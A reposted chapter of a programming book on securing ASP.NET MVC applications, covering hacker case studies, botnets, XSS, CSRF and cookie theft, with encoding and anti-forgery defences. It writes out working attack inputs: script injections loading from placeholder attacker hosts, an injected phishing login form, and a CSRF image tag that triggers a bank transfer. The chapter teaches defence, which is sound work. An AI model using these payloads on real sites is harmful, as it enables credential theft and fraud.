Chapter 9 - Securing Your Application -- Professional ASP.NET MVC 1.0

2019-03-02 23:40|来源: 网路

Overview

Let's face it: security isn't sexy. Most of the time when you read a chapter on security it's either underwritten or very, very overbearing. The good news for you is that the authors read these books, too — a lot of them — and we're quite aware that we're lucky to have you as a reader, and we're not about to abuse that trust. In short, we really want this chapter to be informative because it's very important!

This chapter is one you absolutely must read, as ASP.NET MVC doesn't have as many automatic protections as ASP.NET Web Forms does to secure your page against malicious users. To be perfectly clear: ASP.NET Web Forms tries hard to protect you from a lot of things. For example:

  • Server Components HTML-encode displayed values and attributes to help prevent XSS attacks.

  • View State is encrypted and validated to help prevent tampering with form posts.

  • Request Validation (@page validaterequest=" true") intercepts malicious-looking data and offers a warning (this is something that is still turned on by default with ASP.NET MVC).

  • Event Validation helps prevent against injection attacks and posting invalid values.

The transition to ASP.NET MVC means that handling some of these things falls to you — this is scary for some folks, a good thing for others.

If you're of the mind that a framework should "just handle this kind of thing" — well, we agree with you, and there is a framework that does just this: ASP.NET Web Forms, and it does it very well. It comes at a price, however, which is that you lose some control with the level of abstraction introduced by ASP.NET Web Forms (see Chapter 3 for more details). For some this price is negligible; for others it's a bit too much. We'll leave the choice to you — but before you make this decision, you should be informed, and that's what this chapter is all about — the things you'll have to do for yourself with ASP.NET MVC.

The number one excuse for insecure applications is a lack of information or understanding on the developer's part, and we'd like to change that — but we also realize that you're human and are susceptible to sleep. Given that, we'd like to offer you the punch line first, in what we consider to be critical summary statement of this chapter:

  • Never, ever trust any data your users give you. Ever.

  • Any time you render data that originated as user input, HTML-encode it (or Attribute Encode it if it's displayed as an attribute value).

  • Don't try to sanitize your users HTML input yourself (using a whitelist or some other method) — you'll lose.

  • Use HTTP-only cookies when you don't need to access cookies via client-side script (which is most of the time).

  • Strongly consider using the AntiXSS library (www.codeplex.com/AntiXSS)

There's obviously a lot more we can tell you — including how these attacks work and about the minds behind them. So hang with us — we're going to venture into the minds of your users, and, yes, the people who are going to try to hack your site are your users, too. You have enemies, and they are waiting for you to build this application of yours, so they can come and break into it. If you haven't faced this before, then it's usually for one of two reasons:

  • You haven't built an application.

  • You didn't find out someone hacked your application.

Hackers, crackers, spammers, viruses, malware — they want into your computer and the data inside it. Chances are that your e-mail inbox has deflected many e-mails in the time that it's taken you to read this. Your ports have been scanned, and most likely an automated worm has tried to find its way into your PC through various operating system holes.

This may seem like a dire way to start this chapter; however, there is one thing that you need to understand straight off the bat: it's not personal. You're just not part of the equation. It's a fact of life that some people consider all computers (and their information) fair game; this is best summed up by the story of the turtle and the scorpion:

You and your application are surrounded by scorpions — each of them is asking for a ride.

 

 

This is a War

We're at war and have been ever since you plugged your first computer into the Internet. For the most part, you've been protected by spam filters and antivirus software, which fend off several attempted intrusions per hour.

When you decided to build a web application, the story became a little more dramatic. You've moved outside the walls of the keep and have ventured out toward the frontlines of a major, worldwide battle: the battle for information. It's your responsibility to keep your little section of the Great Wall of Good as clear of cracks as possible, so the hordes don't cave in your section.

This may sound drastic — perhaps even a little dramatic — but it's actually very true. The information your site holds can be used in additional hacks later on. Worse yet, your server or site can be used to further the evil that is junk mail or possibly to participate in a coordinated zombie attack.

Sun Tzu, as always, put's it perfectly:

"If you know both yourself and your enemy, you will win numerous battles without danger."

together with:

"All warfare is based on deception."

is where we will begin this discussion. The danger your server and information face doesn't necessarily come from someone on the other end of the line. It can come from perceived friends, sites that you visit often, or software you use routinely. Most security issues for users come from deception.

Knowing Your Enemy's Mind

If you've ever read a book about hackers and the hacker mentality, one thing quickly become apparent: there is no reason why they do it. Like the scorpion, it's in their nature. It's worth diving a bit deeper into these individuals, what they do, how they think, and the software they use to try to get at the information on your computer. The term Black Hat is used quite often to describe hackers who set out to explore and steal information "for the fun of it." White Hat hackers generally have the same skills, but put their talents to good use, creating Open Source software and generally trying to help.

The first thing to embrace is that the Black Hats are smarter than you and most likely know 10 times what you do about computer systems and networks. This may or may not be true — but if you assume this from the beginning, you're ahead of the game. There is a natural order of sorts at work here — an evolution of hackers that are refining their evil over time to become even more evil. The one's who have been caught are only providing lessons to the ones who haven't, making the ones left behind more capable and smarter than before. It's a vicious game and one that we're a long way from stopping.

Case Study: The Relentless Mischief of Kevin Poulsen

Kevin Poulsen has attained god status in the world of digital crimes. He started working with computers at a very young age and was quickly recognized as a teenage computer prodigy. During his twenties, Kevin "fell to the dark side," assuming the identity "Dark Dante," while terrorizing the local phone company, Pacific Bell.

Kevin was patient and driven, reportedly staying up for days at a time, learning everything he could about a system and its vulnerabilities. During the late 1980s, Kevin managed to completely map out the switching systems of Pacific Bell and commanded nearly all of the communication company's internal servers and network. The remarkable thing about this, however, is that Pacific Bell never knew of his presence.

On June 1, 1990, Kevin made his infiltration pay off . KIIS FM held a contest, wherein they were going to give away a brand new Porsche 944, valued at over $50,000, to the 102nd caller after a series of three songs was played. Kevin and his friends listened all day long and shortly after noon, the three songs were played, which sent Kevin and his friends into action.

Kevin was logged in to Pacific Bell's switching network, and he quickly disabled all the switches serving KIIS FM, except for those routing his and his friend's home phones. They picked up their phones and started to call. No one else, anywhere in the world, could make it through to KIIS FM, save for Kevin and friends, and they quickly racked up 101 calls in about 30 minutes. Kevin placed the 102nd call — winning the Porsche, while simultaneously resetting Pacific Bell's switching system back to its original state.

Kevin perpetrated various other crimes that quickly caught the attention of the federal authorities, and he soon was on the run. Earlier in his life, the government had been on to him as well, but instead of throwing him in jail, they decided to put the scorpion on their backs and hired him to make their systems more secure.

He worked diligently to make Pentagon systems more secure as well as those of other agencies, but, when he was off work, he would continue his life as Dark Dante. No one knows for sure, but it's been suggested that Kevin left himself a vast network of back doors and security holes in the government systems that he worked on. It has never been proven that he did this, but many people wonder how Kevin was able to remain a fugitive from the FBI for over 17 months — only to be caught with the help of the TV show America's Most Wanted.

Kevin is indicative of the curious genius that lit the fire of geek hackers in the 1970s and 1980s. His exploits may seem tame — consisting of little else than mischief and small-scale information crimes — but that may be only a function of the times.

One can only imagine what Kevin would have been capable of had he flexed his criminal genius today. It's safe to say that he would, most likely, have been a lot more low profile than to jam the phone lines to a radio station so that he could win a Porsche, and it's a safe bet that money would have been at the top of his mind.

If Kevin were prowling the Internet these days, you probably wouldn't have much to fear from him directly — in other words, he probably wouldn't be hacking your server to steal your code, for instance. If you were Kevin — if you had his phr34k sk1llz — what would you want from an online application? The answer is: something that will pay, with the least chance of getting caught. Usually, this comes in the form of user data: e-mail addresses and passwords, credit card numbers, and other sensitive information that your users trust you with.

The stealing of information is silent, and you most likely will never know that someone is (perhaps routinely) stealing your site's information — they don't want you to know. With that, you're at a disadvantage.

Information theft has supplanted curiosity as the motivator for hackers, crackers, and phreaks on the Web. It's big business.

Case Study: Ph34rs0m Sk1llz: DEFCON Capture the Flag

DEFCON is the world's largest hacker convention (yes, they have such things) and is held annually in Las Vegas. The audience is mainly computer security types (consultants, journalists, etc.), law enforcement (FBI, CIA, etc., who do not need to identify themselves), and coders who consider themselves to be on the fringe of computing.

A lot of business is done at the convention, as you can imagine, but there are also the obligatory "feats of technical strength" for the press to write about. One of these is called "Capture the Flag," which is also a popular video game format, coincidently. The goal of Capture the Flag (or "CTF") is for hacker teams to successfully compromise a set of specially configured servers. These aren't your typical servers — they are set up specifically to defend against such attacks and are configured specially for CTF by a world-renowned security specialist.

The servers (usually 12 or so) are set up with specific "vulnerabilities":

  • A web server

  • A text-based messaging system

  • A network-based optical character recognition system

The teams are unaware of what each server is equipped with when the competition begins.

The scoring is simple: one point is awarded for penetrating the security of a server. Penetrate them all, and you win. If a team doesn't win, the contest is called at the end of 48 hours, and the team with the most points takes the crown. Variations on the game include penetrating a server and then resetting its defenses in order to "secure it" against other teams. The team who holds the most servers at the end of the competition wins.

The teams that win the game state that discipline and patience are what ultimately makes the difference. Hacking the specially configured servers is not easy and usually involves coordinating attacks along multiple fronts, such as coaxing the web server to give up sensitive information, which can then be used in other systems on the server. The game is focused on knowing what to look for in each system, but the rules are wide open, and cheating is quite often encouraged, which usually takes the form of more a personal style of intrusion: social engineering.

Case Study: Deception and Hacking into the Server Room

At one DEFCON CTF, the reigning champion "Ghettohackers" were once again on their way to a winning in a variation of the CTF format called "Root fu." In this format, you "root" your competition by placing a file called "flag.txt" in their "flag room" — usually their C drive or on a server somewhere in the game facility. You can gain points by rooting the main server (and winning) or by rooting your competition.

During this competition, one of the Ghettohackers team members smuggled in an orange hardhat with a reflective vest, and put it on with an electrician's utility belt. He then stood outside the server room (where the event was held) and waited for hotel staff to walk by. When a staff person eventually came by, the hacker impatiently asked if they were there to let him in and said that he was on a schedule and needed to get to a call upstairs.

Eventually he was let in by the hotel staff, and, looking at the diagram on the wall, he quickly figured out which machine was the "main box" — the server holding the main flag room. He pulled out his laptop and plugged it into the machine, quickly hacking his way onto the machine to win the game.

It doesn't take much to deceive people who like to help others — you just need to be evil — and give them a reason to trust you — and you're in.

Case Study: Social Engineering and Kevin Mitnick

Kevin Mitnick is widely regarded as the most prolific and dangerous hacker in U.S. history. Through various ruses, hacks, and scams he found his way into the networks of top communication companies as well as Department of Defense computer systems. He managed to steal a lot of very expensive code by using simple social engineering tricks, such as posing as a company employee or flat out asking employees for his lost password over the phone.

His plan was simple — take advantage of two basic laws about people:

  • We want to be nice and help others.

  • We usually leave responsibility to someone else.

In an interview with CNET, Kevin stated it rather bluntly:

"[Hackers] use the same methods they always have — using a ruse to deceive, influence or trick people into revealing information that benefits the attackers. These attacks are initiated, and in a lot of cases, the victim doesn't realize [it]. Social engineering plays a large part in the propagation of spyware. Usually, attacks are blended, exploiting technological vulnerabilities and social engineering."

Social engineering does not necessarily mean that someone is going to come up to you with a fake moustache and an odd-looking uniform, asking for access to your server. It could come in the form of a fake request from your ISP, asking you to log in to your server's web control panel to change a password. It may also be someone who befriends you online — perhaps wanting to help with a side project you're working on. The key to a good hack is patience, and often it only takes weeks to feel like you "know" someone. Eventually, they may come to know a lot about you and, more hazardously, about your clients and their sensitive information.

 
 

Weapons

As discussed previously, the key personal weapons for Black Hat attackers are:

  • Relentless patience

  • Ingenuity and resources

  • Social engineering skills

These are in no particular order — but they are essentially the three elements that underscore a successful hacker. No matter how much you may know about computers, you are up against someone who likely knows a lot more, and who has a lot more patience. He or she also knows how to deceive you.

The goal for these people is no longer mere exploration. Money is now the motivator, and there's a lot of it to be had if you're willing to be evil. Information stored in your site's database, and more likely the resources available on your machine, are the prizes of today's Black Hats.

Spam

If your system (home or server) is ever compromised, it's likely that it will be in the name of spam.

Spam needs no explanation or introduction. It is ubiquitous and evil, the scourge of the Internet. How it continues to be the source of all evil on the Internet is something within our control, however. If you're wondering why people bother doing it (since spam blocking is fairly effective these days), it turns out that spamming is surprisingly effective — for the cost.

Spamming is essentially free, given how it's carried out. According to one study, usually only 1 in 10 million receivers of spam e-mail "follow through" and click an ad. The cost of sending those 10 million e-mails is close to 0, so it's immediately profitable. To make money, however, the spammers need to up their odds, so more e-mails are sent. Currently, the Messaging Anti-Abuse Workgroup (MAAWG, 2007) estimates that 90 percent (or more) e-mail sent on the Internet is spam, and a growing percentage of that e-mail links to or contains viruses that help the spam network grow itself. This self-growing, automated network of zombie machines (machines infected with a virus that puts them under remote control) is what's called a botnet. Spam is never sent from a central location — it would be far too easy to stop its proliferation in that case.

Most of the time a zombie virus will wait until you've logged out for the evening, and will then open your ports, disguise itself from your network and antivirus software, and start working its evil. It's likely you will never know this is happening, until you are contacted by your ISP, who has begun monitoring the traffic on your home computer or server, wondering why you send so many e-mails at night.

Much of the e-mail that is sent from a zombie node contains links, which will further the spread of itself. These links are less about advertising and more about deceit and trickery, using tactics such as "Stupid Theme", which tells people they have been videotaped naked or won a prize in a contest. When the user clicks the link, they are redirected to a site (which could be yours!), which downloads the virus to their machine. These "zombie hosts" are often well-meaning sites (like yours!), which don't protect against cross-site scripting (XSS) or allow malicious ads to be served — covered this later in the chapter.

As of today, the "lone gunmen" hackers like Poulsen and Mitnick have been replaced by digital militias of virus builders, all bent on propagating global botnets.

Case Study: Profiting from Evil with the Srizbi and Storm Botnets

There is a great chance that you've had the Srizbi, Kraken, or Storm Trojans on a computer that you've worked on (server or desktop). These Trojans are so insidious and pervasive that Wikipedia credits them with sending over 90 percent of the world's spam. Currently, the botnet that is controlled by these Trojans is estimated to be around 1,500,000 computers and servers and is capable of sending up to 100 billion messages a day.

The Storm Worm

In September of 2007, the FBI declared that the Storm botnet was both sophisticated and powerful enough to force entire countries offline. Some have argued, however, that trying to compute the raw power of these botnets is missing the point, and some have suggested the comparison is like comparing "an army of snipers to a the power of a nuclear bomb."

The Storm network has propagated, once again, largely due to social engineering and provocative e-mailing, which entices users to click on a link that navigates them to an infected web site (which could be yours!). To stay hidden, the servers that deliver the virus re-encode the binary file so that a "signature" changes, which defeats the antivirus and malware programs running on most machines.

These servers are also able to avoid detection, as they can rapidly change their DNS entries — sometimes minutes apart, making these servers almost untraceable.

The Srizbi Trojan

Srizbi is pure evil, and you've likely visited a web site that has tried to load it onto your computer. It is propagated using "MPack," a commercially available malware kit written in PHP. That's right, you can purchase software with the sole purpose of spreading viruses. In addition to that, you can ask the developers of MPack to help you make your code undetectable by various antivirus and malware services.

MPack is implemented using an iFrame, which embeds itself on a page (out of site) and calls back to a main server, which loads scripts into the user's browser. These scripts detect which type of browser the user is running and what vulnerabilities the scripts can exploit. It's up to the malware creator to read this information and plant his or her evil on your computer.

Because MPack works in an iFrame, it is particularly effective against sites that don't defend very well against XSS. An attacker can plant the required XSS code on an innocent web site (like yours!) and, thus, create a propagation point, which then infects thousand of other users.

The worm itself has been analyzed by security experts worldwide, and most agree that the elegance and efficiency of the code is genius. For its size, the application packs a massive punch and is capable of a vast array of functionality, including sending e-mails, seeking out and downloading instructions, hiding from every known antivirus program, and performing various feats of system trickery.

Srizbi runs in kernel mode (capable of running with complete freedom at the core operating system level, usually unchecked and unhindered) and will actually take command of the operating system, effectively pulling a "Jedi mind trick" by telling the machine that it's not really there. One of these tricks is to actually alter the NTFS file system drivers, making itself completely unrecognizable as a file and rendering itself invisible. In addition to this, Srizbi is also able to manipulate the infected system's TCP/IP instructions, attaching directly to the drivers and manipulating them so that firewalls and network sniffers will not see it. Very evil.

The hallmark of Srizbi is its silence and stealth. All of the estimates for infection that we've suggested here are just that — estimates. No one knows the real numbers of infected machines.

Digital Stealth Ninja Network

Many FBI officials fear that these vast botnets will be used to attack power grids or government web sites, or worse yet, will be used in denial of service (DoS) attacks on entire countries. Matt Sergeant, a security analyst at MessageLabs postulates:

"In terms of power, [the botnet] utterly blows the supercomputers away. If you add up all 500 of the top supercomputers, it blows them all away with just two million of its machines. It's very frightening that criminals have access to that much computing power, but there's not much we can do about it." It is estimated that only 10-20 percent of the total capacity and power of the Storm botnet is currently being used."

One has to wonder at the capabilities of these massive networks, and why they aren't being used for more evil purposes, such as attacking governments or corporations that don't meet with some agenda (aka digital terrorism). The only answer that makes sense is that they are making money from what they are doing, and are run by people who want to keep making money and who also want to stay out of sight. This can change, of course, but for now, know that you can make a difference in this war. You can help by knowing your vulnerabilities as the developer of your site and possible caretaker of your server.

The rest of this chapter is devoted to helping you do this within the context of ASP.NET MVC.

 
 

Threat: Cross-Site Scripting (XSS)

You have allowed this attack before and maybe you just got lucky and no one walked through the unlocked door of your bank vault. Even if you're the most zealous security nut, you've let this one slip — as we discussed previously, the Black Hats of this world are remarkably cunning, and they work harder and longer at doing evil than you work at preventing it. It's unfortunate, as cross-site scripting (XSS) is the number one web site security vulnerability on the Web, and it's largely because of web developers unfamiliar with the risks (and hopefully, if you've read the previous sections, you're not one of them!).

XSS can be carried out one of two ways: by a user entering nasty script commands into a web site that accepts "unsanitized" user input or by user input being directly displayed on a page. The first example is called "Passive Injection" — whereby a user enters nastiness into a textbox, for example, and that script gets saved into a database and redisplayed later. The second is called "Active Injection" and involves a user entering nastiness into an input, which is immediately displayed on screen. Both are evil — let's take a look at Passive Injection first.

Passive Injection

XSS is carried out by "injecting" script code into a site that accepts user input. An example of this is a blog, which allows you to leave a comment to a post, as shown in Figure 9-1.

Image from book
Figure 9-1

This has four text inputs: name, e-mail, comment, and URL if you have a blog of your own. Forms like this make XSS hackers salivate for two reasons — first, they know that the input submitted in the form will be displayed on the site, and second, they know that encoding URLs can be tricky, and developers usually will forgo checking these properly since they will be made part of an anchor tag anyway.

One thing to always remember (if we haven't overstated it already) is that the Black Hats out there are a lot craftier than you are. We won't say they're smarter, but you might as well think of them this way — it's a good defense.

The first thing an attacker will do is see if the site will encode certain characters upon input. It's a safe bet that the comment field is protected and probably so is the name field, but the URL field smells ripe for injection. To test this, you can enter an innocent query, like the one in Figure 9-2.

Image from book
Figure 9-2

It's not a direct attack, but you've placed a "less than" sign into the URL; what you want to see is if it gets encoded to &lt;, which is the HTML replacement character for "<". If you post the comment and look at the result, all looks fine (see Figure 9-3).

Image from book
Figure 9-3

There's nothing here that suggests anything is amiss. But we've already been tipped off that injection is possible — there is no validation in place to tell you that the URL you've entered is invalid! If you view the source of the page, your XSS ninja hacker reflexes get a rush of adrenaline because right there, plain as day, is very low-hanging fruit:

<a href=" No blog! Sorry :<">Rob Conery</a>

This may not seem immediately obvious, but take a second and put your Black Hat on, and see what kind of destruction you can cause. See what happens when you enter this:

"><iframe src=" http://haha.juvenilelamepranks.example.com" height="400" width=500/>

This entry closes off the anchor tag that is not protected and then forces the site to load an iFrame, as shown in Figure 9-4.

Image from book
Figure 9-4

This would be pretty silly if you were out to hack a site because it would tip off the site's administrator and a fix would quickly be issued. No, if you were being a truly devious Black Hat Ninja Hacker, you would probably do something like this:

"></a><script src=" http://srizbitrojan.evilzombiedeathvirus.example.com"></script> <a href="

This line of input would close off the anchor tag, inject a script tag, and then open another anchor tag so as not to break the flow of the page. No one's the wiser (see Figure 9-5).

Image from book
Figure 9-5

Even when you hover over the name in the post you won't see the injected script tag — it's an empty anchor tag!

Active Injection

Active XSS injection involves a user sending in malicious information that is immediately shown on the page and is not stored in the database. The reason it's called "Active" is that it involves the user's participation directly in the attack — it doesn't sit and wait for a hapless user to stumble upon it.

You might be wondering how this kind of thing would represent an attack. It seems silly, after all, for users to pop up JavaScript alerts to themselves or to redirect themselves off to a porn site using your site as a graffiti wall — but there are definitely reasons for doing so.

Consider the "search this site" mechanism, found on just about every site out there. Most site searches will return a message saying something to the effect of "Your search for ‘XSS Attack!' returned X results:"; Figure 9-6 shows one from Rob's blog.

Image from book
Figure 9-6

Most of the time this message is not HTML-encoded. The general feeling here is that if the user wants to play XSS with themselves, let them. The problem comes in when you enter the following text into a site that is not protected against Active Injection (using a Search box, for example):

"<br><br>Please login with the form below before proceeding:<formaction=" mybadsite.aspx"><table><tr><td>Login:</td><td><input type=text length=20name=login></td></tr><tr><td>Password:</td><td><input type=text length=20name=password></td></tr></table><input type=submit value=LOGIN></form>"

This little bit of code (which can be extensively modified to mess with the search page) will actually output a login form on your search page that submits to an offsite URL. There is a site that is built to show this vulnerability (from the people at Acunetix, which built this site intentionally to show how Active Injection can work), and if you load the above term into their search form, this will render Figure 9-7.

Image from book
Figure 9-7

You could have spent a little more time with the site's CSS and format to get this just right, but even this basic little hack is amazingly deceptive. If a user were to actually fall for this, they would be handing the attacker their login information!

The basis of this attack is our old friend, social engineering:

"Hey look at this cool site with naked pictures of you! You'll have to log in — I protected them from public view"

The link would be this:

<a href=" http://testasp.acunetix.com/Search.asp?tfSearch= <br><br>Please loginwith theform below before proceeding:<formaction=" mybadsite.aspx"><table><tr><td>Login:</td><td><input type=text length=20name=login></td></tr><tr><td>Password:</td><td><input type=text length=20name=password></td></tr></table><input type=submit value=LOGIN></form>">look atthis coolsite with naked pictures</a>

There are plenty of people falling for this kind of thing every day, believe it or not.

Preventing XSS

XSS can be avoided most of the time by using simple HTML encoding — the process by which the server replaces HTML reserved characters (like < and >) with "codes." You can do this with ASP.NET MVC in the View simply by using Html.Encode or Html.AttributeEncode for attribute values. Implementing this in Oxite means changing one small line of code, which the team has done already.

If you get only one thing from this chapter, please let it be this: every bit of output on your pages should be HTML-encoded or HTML-attribute-encoded. We said this at the top of the chapter, but we'd like to say it again: Html.Encode is your best friend.

It's worth mentioning at this point that ASP.NET Web Forms guides you into a system of using server controls and postback, which, for the most part, tries to prevent XSS attacks. Not all server controls protect against XSS (Labels and Literals for example), but the overall Web Forms package tends to push people in a safe direction.

ASP.NET MVC offers you more freedom — but it also allows you some protections out of the box. Using the HtmlHelpers, for example, will encode your HTML as well as encode the attribute values for each tag. In addition, you're still working within the Page model, so every request is validated unless you turn this off manually.

But you don't need to use any of these things to use ASP.NET MVC. You can use an alternate ViewEngine and decide to write HTML by hand — this is up to you, and that's the point. This decision, however, needs to be understood in terms of what you're giving up, which are some automatic security features.

Html.AttributeEncode and Url.Encode

Most of the time it's the HTML output on the page that gets all the attention; however, it's important to also protect any attributes that are dynamically set in your HTML. In the original example shown previously, we showed you how the author's URL can be spoofed by injecting some malicious code into it. This was accomplished because the sample outputs the anchor tag like this:

<a href="<%=Url.Action(AuthorUrl)%>"><%=AuthorUrl%></a>

To properly sanitize this link, you need to be sure to encode the URL that you're expecting. This replaces reserved characters in the URL with other characters (" "with % for example).

You might also have a situation where you're passing a value through the URL based on what the user input somewhere on your site:

<a href="<%=Url.Action("index"," home",new {name=ViewData["name"]})%>>Click here</a>

If the user is evil, he could change this name to:

"></a><script src=" http://srizbitrojan. evilzombiedeathvirus.example.com"></script> <ahref="

And then pass that link on to unsuspecting users. You can avoid this by using encoding with Url.Encode or Html.AttributeEncode:

<a href="<%=Url.Action("index"," home",new{name=Html.AttributeEncode(ViewData["name"])})%>>Click here</a>

or

<a href="<%=Url.Encode(Url.Action("index"," home",new {name=ViewData["name"]}))%>>Clickhere</a>

Bottom line: never, ever trust any data that your user can somehow touch or use. This includes any form values, URLs, cookies, or personal information received from third-party sources such as Open ID. And encode everything you possibly can.

 
 

Threat: Cross-Site Request Forgery

A cross-site request forgery (CSRF pronounced "C-surf" but also known by the acronym XSRF) attack can be quite a bit more potent than simple cross-site scripting, discussed earlier. To fully understand what CSRF is, let's break it into its parts: XSS plus a confused deputy.

We've already discussed XSS, but the term "confused deputy" is new and worth discussing. Wikipedia describes a confused deputy attack as:

"A confused deputy is a computer program that is innocently fooled by some other party into misusing its authority. It is a specific type of privilege escalation."

In this case that deputy is your browser, and it's being tricked into misusing its authority in representing you to a remote web site. To illustrate this, we've worked up a rather silly yet annoying example.

Suppose that you work up a nice site that lets users log in and out and do whatever it is your site lets them do. The Login action lives in your Account Controller, and you've decided that you'll keep things simple and extend the AccountController to include a Logout action as well, which will forget who the user is:

public ActionResult Logout() {    FormsAuth.SignOut();    return RedirectToAction("Index", "Home");}

Now, suppose that your site allows limited whitelist HTML (a list of acceptable tags or characters that might otherwise get encoded) to be entered as part of a comment system (maybe you wrote a forums app or a blog) — most of the HTML is stripped or sanitized, but you allow images because you want users to be able to post screen shots.

One day, a nice person adds this image to their comment:

<img src="/account/logout" />

Now, whenever anyone visits this page, they are logged out of the site. Again, this isn't necessarily a CSRF attack, but it shows how some trickery can be used to coax your browser into making a GET request without your knowing about it. In this case, the browser did a GET request for what it thought was an image — instead it called the logout routine and passed along your cookie. Boom — confused deputy.

This attack works because of the way the browser works. When you log in to a site, information is stored in the browser as a cookie. This can be an in-memory cookie (a "session" cookie) or it can be a more permanent cookie written to file. Either way the browser tells your site that it is indeed you, making the request.

This is at the core of CSRF — the ability to use XSS plus a confused deputy (and a sprinkle of social engineering, as always) to pull off an attack on one of your users. Unfortunately, CSRF happens to be a vulnerability that not many sites have prevention measures for (we'll talk about these in just a minute).

Let's up the stakes a bit and work up a real CSRF example, so put on your Black Hats and see what kind of damage you can do with your favorite massively public, unprotected website. We won't use real names here — so let's call this site "Big Massive Site."

Right off the bat, it's worth noting that this is an odds game that you, as Mr. Black Hat, are playing with Big Massive Site's users. There are ways to increase these odds, which are covered in a minute, but straight away the odds are in your favor because Big Massive Site has upwards of 50 million requests per day.

Now it comes down to the Play — finding out what you can do to exploit Big Massive Site's security hole: the inclusion of linked comments on their site. In surfing the Web and trying various things, you have amassed a list of "Widely Used Online Banking Sites" that allow transfers of money online as well as the payment of bills. You've studied the way that these Widely Used Online Banking Sites actually carry out their transfer requests, and one of them offers some serious low-hanging fruit — the transfer is identified in the URL:

Granted, this may strike you as extremely silly — what bank would ever do this? Unfortunately the answer to that question is "too many," and the reason is actually quite simple — web developers trust the browser far too much, and the URL request that you're seeing above is leaning on the fact that the server will validate the user's identity and account using information from a session cookie. This isn't necessarily a bad assumption — the session cookie information is what keeps you from logging in for every page request! The browser has to remember something!

There are still some missing pieces here, and for that you need to use a little social engineering! You pull your Black Hat down a little tighter and log in to Big Massive Site, entering this as a comment on one of the main pages:

"Hey did you know that if you're a Widely Used Bank customer the sum of the digits of your account number add up to 30? It's true! Have a look: http://www.widelyusedbank.example.com"

You then log out of Big Massive Site and log back in with a second, fake account, leaving a comment following the "seed" above as the fake user with a different name:

"OMG you're right! How weird!<img src ="http://widelyusedbank.example.com?function=transfer&amount=1000&toaccountnumber=23234554333&from=checking" />.

The game here is to get Widely Used Bank customers to go log in to their account and try to add up their numbers. When they see that it doesn't work, they head back over to Big Massive Site to read the comment again (or they leave their own saying it doesn‘t work).

Unfortunately, for Perfect Victim, their browser still has their login session stored in memory — they are still logged in! When they land on the page with the CSRF attack, a request is sent to the bank's web site (where they are not ensuring that you're on the other end), and bam, Perfect Victim just lost some money.

The image in the comment (with the CSRF link) will just be rendered as a broken red X, and most people will think it's just a bad avatar or emoticon. What it really is a remote call to a page that uses GET to run an action on a server — a confused deputy attack that nets you some cold cash. It just so happens that the browser in question is Perfect Victim's browser — so it isn't traceable to you (assuming that you've covered your behind with respect to fake accounts in the Bahamas, etc.). This is almost the perfect crime!

This attack isn't restricted to simple image tag/GET request trickery; it extends well into the realm of spammers who send out fake links to people in an effort to get them to click to go to their site (as with most bot attacks). The goal with this kind of attack is to get users to click the link, and when they land on the site, a hidden iFrame or bit of script auto-submits a form (using HTTP POST) off to a bank, trying to make a transfer. If you're a Widely Used Bank customer and have just been there, this attack will work.

Revisiting the previous forum post social engineering trickery — it only takes one additional post to make this latter attack successful:

"Wow! And did you know that your Savings account number adds up to 50! This is so weird — read this news release: <a href="http://badnastycsrfsite.example.com">CNN.com</a> about it — it's really weird!"

Clearly you don't need even need to use XSS here — you can just plant the URL and hope that someone is clueless enough to fall for the bait (going to their Widely Used Bank account and then heading to your fake page at http://badnastycsrfsite.example.com).

Preventing CSRF Attacks

You might be thinking that this kind of thing should be solved by the framework — and it is! ASP.NET MVC puts the power in your hands, so perhaps a better way of thinking about this is that ASP.NET MVC should enable you to do the right thing, and indeed it does!

Token Verification

ASP.NET MVC includes a nice way of preventing CSRF attacks, and it works on the principle of verifying that the user who submitted the data to your site did so willingly. The simplest way to do this is to embed a hidden input into each form request that contains a unique value. You can do this with the HTML Helpers by including this in every form:

<form action="/account/register" method=" post"><%=Html.AntiForgeryToken()%>…</form>

Html.AntiForgeryToken will output an encrypted value as a hidden input:

<input type=" hidden" value="012837udny31w90hjhf7u">

This value will match another value that is stored as a session cookie in the user's browser. When the form is posted, these values will be matched using an ActionFilter:

[ValidateAntiforgeryToken]public ActionResult Register(…)

This will handle most CSRF attacks — but not all of them. In the last example above, you saw how users can be registered automatically to your site. The anti-forgery token approach will take out most CSRF-based attacks on your Register method, but it won't stop the "bots" out there that seek to auto-register (and then spam) users to your site. We'll talk about ways to limit this kind of thing later in the chapter.

GETs Don't Change Stuff

Bad grammar for sure — but, in general, a good rule of thumb is that you can prevent a whole class of CSRF attacks by only "changing" things in your DB or on your site by using POST. This means Registration, Logout, Login, and so forth. At the very least, this limits the confused deputy attacks somewhat.

HttpReferrer Validation

This can be handled using an ActionFilter (see Chapter 8), wherein you check to see if the client that posted the form values was indeed your site:

public class IsPostedFromThisSiteAttribute : AuthorizeAttribute{    public override void OnAuthorize(AuthorizationContext filterContext)    {        if (filterContext.HttpContext != null)        {           if (filterContext.HttpContext.Request.UrlReferrer == null)              throw new System.Web.HttpException("Invalid submission");           if (filterContext.HttpContext.Request.UrlReferrer.Host != "mysite.com")              throw new System.Web.HttpException ("This form wasn't submittedfromthis site!");        }    }}

You can then use this filter on the Register method, like so:

[IsPostedFromThisSite]public ActionResult Register(…)

As you can see there are different ways of handling this — which is the point of MVC. It's up to you to know what the alternatives are and to pick one that works for you and your site.

 
 

Threat: Cookie Stealing

Cookies are one of the things that make the Web usable. Without them, life becomes login box after login box. You can disable cookies on your browser to minimize the theft of your particular cookie (for a given site), but chances are you'll get a snarky warning that "Cookies must be enabled to access this site."

There are two types of cookies:

  • Session cookies are stored in the browser's memory and are transmitted via the header during every request.

  • Persistent cookies are stored in actual text files on your computer's hard drive and are transmitted the same way.

The main difference is that session cookies are "forgotten" when your session ends — persistent cookies are not, and a site will "remember" you the next time you come along.

If you could manage to steal someone's authentication cookie for a web site, you could effectively assume their identity and carry out all the actions that they are capable of. This type of exploit is actually very easy — but it relies on XSS vulnerability. The attacker must be able to inject a bit of script onto the target site in order to steal the cookie.

Jeff Atwood of CodingHorror.com wrote about this issue recently as StackOverflow.com was going through beta:

"Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges."

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page:

<img src=" "http://www.a.com/a.jpg<script type=text/javascriptsrc=" http://1.2.3.4:81/xss.js">" /><<imgsrc=" "http://www.a.com/a.jpg</script>"

StackOverflow.com allows a certain amount of HTML in the comments — something that is incredibly tantalizing to an XSS hacker. The example that Jeff offered on his blog is a perfect illustration of how an attacker might inject a bit of script into an innocent-appearing ability such as adding a screen shot image.

